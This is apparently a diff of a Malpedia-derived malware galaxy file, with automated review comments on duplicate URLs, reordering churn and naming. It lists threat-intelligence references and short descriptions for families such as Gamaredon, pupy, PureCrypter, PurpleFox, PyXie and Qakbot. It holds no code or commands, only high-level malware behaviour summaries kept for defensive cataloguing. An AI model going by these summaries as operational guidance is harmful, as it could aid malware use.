"https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/",
"https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/",
- "https://cert.gov.ua/news/46",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
- "https://attack.mitre.org/groups/G0047",
- "https://cert.gov.ua/news/42",
- "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt",
+ "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine",
- "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/"
+ "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government",
+ "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
+ "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://attack.mitre.org/groups/G0047",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
+ "https://cert.gov.ua/news/46",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
],
"synonyms": [
"Pterodo"
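Review bot: after the reorder the list contains near-duplicates that differ only by a trailing slash: `https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/` and the same URL without the slash, and `https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations` in both forms; the Unit 42 toolset-evolution post is also present under both the unit42 and researchcenter hosts. Dedupe on a normalized URL so each source appears once.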
@@ -37081,6 +39020,7 @@
"https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
],
"synonyms": [
+ "poscardstealer",
"pospunk",
"punkeypos"
],
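Review bot: `poscardstealer` is added here as a synonym of punkeypos, but this file also has a separate cluster whose `value` is `poscardstealer` (the entry preceding PoshC2 in this patch), so the same name now resolves to two clusters. If the two are being merged, the standalone cluster should be retired in the same change; if they are distinct, the synonym should not be added.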
@@ -37094,21 +39034,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt",
"https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
- "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
- "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://github.com/n1nj4sec/pupy",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
+ "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
+ "https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt"
],
"synonyms": [
"Patpoopy"
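Review bot: the pupy refs end up holding both "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" and "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", which are the old and the post-acquisition location of the same Elfin/APT33 article; keep one of them, or have the generator deduplicate on a canonical form of the URL. The rest of this hunk removes and re-adds unchanged URLs in a new order, which buries the handful of genuinely new references (infinitumit, the Unit 42 Magic Hound post, cta-2020-0123, the FireEye summit deck, securityaffairs, the FireEye "overruled" post, k7computing) in reordering noise.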
@@ -37118,14 +39059,28 @@
"uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8",
"value": "pupy (Windows)"
},
+ {
+ "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "554993dc-2a30-43d9-ac96-fc9b9cca29f6",
+ "value": "PureCrypter"
+ },
{
"description": "ransomware",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker",
- "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e",
"https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md"
+ "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md",
+ "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e"
],
"synonyms": [],
"type": []
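Review bot: the new PureCrypter description has a trailing space before the closing quote and joins its sentences with bare "\r\n" separators and no terminal punctuation ("... in Google’s Protocol Buffer message format "); since this galaxy is generated from Malpedia, normalise at the import step (strip whitespace, collapse "\r\n" to a single newline) so the cleanup survives the next regeneration. The PureLocker part of the hunk only moves the xforce.ibmcloud.com URL from second to last position and adds no reference.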
@@ -37138,24 +39093,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox",
- "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
- "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html",
- "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf",
- "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
- "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit",
- "https://s.tencent.com/research/report/1322.html",
- "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
- "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
- "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit",
- "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
"https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
+ "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
+ "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
+ "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit",
+ "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html",
+ "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
+ "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html"
+ "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
+ "https://s.tencent.com/research/report/1322.html",
+ "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
+ "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit"
],
"synonyms": [],
"type": []
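Review bot: this PurpleFox hunk is pure churn, removing 16 URLs and re-adding the same 16 in a different order with no net change to the refs list; that makes every regeneration of malpedia.json produce large, unreviewable diffs. Please have the generator emit refs in a deterministic order (either the order Malpedia returns or a sorted list) so a hunk only appears when a reference is actually added or removed.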
@@ -37164,7 +39119,7 @@
"value": "PurpleFox"
},
{
- "description": "",
+ "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave",
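Review bot: the new PurpleWave description opens with "ZScaler reported ...", but the vendor spells its name "Zscaler"; the text also uses "\r\n\r\n" as a paragraph break. Both come from the upstream Malpedia description, so correct them there (or in the import normalisation) rather than by hand-editing the JSON.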
@@ -37181,14 +39136,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo",
- "https://www.secureworks.com/research/pushdo",
- "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "http://malware-traffic-analysis.net/2017/04/03/index2.html",
- "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
- "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/"
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
+ "https://www.secureworks.com/research/pushdo",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "http://malware-traffic-analysis.net/2017/04/03/index2.html",
+ "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex"
],
"synonyms": [],
"type": []
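Review bot: the Pushdo refs keep both "http://www.secureworks.com/research/threat-profiles/gold-essex" and "https://www.secureworks.com/research/threat-profiles/gold-essex", which differ only in scheme and point at the same threat profile. Drop the http:// variant, or normalise the scheme before deduplicating in the generator; this hunk otherwise only reorders the existing list.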
@@ -37239,32 +39194,32 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker",
- "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.group-ib.com/blog/prolock_evolution",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://www.group-ib.com/blog/prolock",
- "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
- "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
- "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
"https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.group-ib.com/blog/prolock",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
+ "https://www.intrinsec.com/egregor-prolock/",
"https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
"https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
- "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/"
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/"
],
"synonyms": [
"ProLock"
@@ -37290,14 +39245,30 @@
"uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab",
"value": "pwnpos"
},
+ {
+ "description": "Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today's date being later than 2016-04-03 and existence of a file C:\\txt.txt)",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyfiledel",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm.win32.pyfiledel.aa",
+ "https://biebermalware.wordpress.com/2018/02/14/reversing-py2exe-binaries/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ea8f44b0-6940-42e0-a93f-77a6b572b140",
+ "value": "win.pyfiledel"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa",
- "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://bin.re/blog/pykspas-inferior-dga-version/",
"https://www.youtube.com/watch?v=HfSQlC76_s4",
"https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
+ "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://bin.re/blog/the-dga-of-pykspa/",
"https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/"
],
"synonyms": [],
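Review bot: the new entry uses "value": "win.pyfiledel", which is Malpedia's internal family id, whereas the neighbouring entries use the display name (compare "value": "pwnpos" at the top of this hunk); the generator appears to fall back to the id when Malpedia supplies no common name, and that fallback should at least be documented, or better, map to a readable name so galaxy tags stay consistent. In the pykspa refs, the newly added "https://bin.re/blog/the-dga-of-pykspa/" and "https://bin.re/blog/pykspas-inferior-dga-version/" mirror the two johannesbader.ch posts that are still listed ("/2015/03/the-dga-of-pykspa/" and "/2015/07/pykspas-inferior-dga-version/"), so each article is now referenced twice.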
@@ -37311,14 +39282,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
+ "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
"https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/",
"https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
- "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
"https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
- "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/"
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/"
],
"synonyms": [
"Locky Locker"
@@ -37333,19 +39304,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/"
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx"
],
"synonyms": [
"PyXie RAT"
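Review bot: the PyXie refs list the Unit 42 vatet-pyxie-defray777 series with inconsistent trailing slashes ("/2/" and "/5/" versus "/3" and "/4"); normalise them to one form, since a trailing-slash mismatch is also what defeats naive deduplication when Malpedia later re-exports a URL in the other form. No reference is added or removed in this hunk, only reordered.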
@@ -37372,13 +39343,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
"https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
- "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/"
+ "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/",
+ "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/"
],
"synonyms": [],
"type": []
@@ -37391,179 +39362,219 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot",
- "https://securelist.com/qakbot-technical-analysis/103931/",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
- "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
- "https://www.malwarology.com/posts/3-qakbot-process-injection/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://twitter.com/TheDFIRReport/status/1361331598344478727",
- "https://www.circl.lu/pub/tr-64/",
- "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.group-ib.com/blog/prolock_evolution",
- "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
- "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
- "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/",
- "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
- "https://twitter.com/Unit42_Intel/status/1461004489234829320",
- "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
- "https://www.elastic.co/security-labs/qbot-configuration-extractor",
- "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/",
- "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://blog.group-ib.com/prometheus-tds",
- "https://twitter.com/_alex_il_/status/1384094623270727685",
- "https://www.um.edu.mt/library/oar/handle/123456789/76802",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
- "http://contagiodump.blogspot.com/2010/11/template.html",
- "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
- "https://www.malwarology.com/2022/04/qakbot-series-process-injection/",
- "https://blog.quosec.net/posts/grap_qakbot_strings/",
- "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html",
- "https://www.malwarology.com/posts/4-qakbot-api-hashing/",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
